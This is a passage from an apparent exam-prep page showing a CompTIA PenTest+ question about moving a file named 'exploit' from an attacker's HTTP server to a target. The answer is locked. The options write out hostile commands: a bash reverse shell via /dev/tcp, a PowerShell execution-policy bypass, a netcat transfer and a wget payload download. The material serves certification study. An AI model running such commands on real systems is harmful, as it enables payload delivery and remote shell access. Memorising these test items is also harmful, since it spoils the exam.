CompTIACompTIA
PT0-002 · Question #97
PT0-002 Question #97: Real Exam Question with Answer & Explanation
Sign in or unlock PT0-002 to reveal the answer and full explanation for question #97. The question stem and answer options stay visible for context.
Attacks and Exploits
Question
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?
Options
- Anc 10.10.51.50 9891 < exploit
- Bpowershell -exec bypass -f \\10.10.51.50\9891
- Cbash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
- Dwget 10.10.51.50:9891/exploit
Unlock PT0-002 to see the answer
You've previewed enough free PT0-002 questions. Unlock PT0-002 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#HTTP server#File transfer#wget#Command-line tools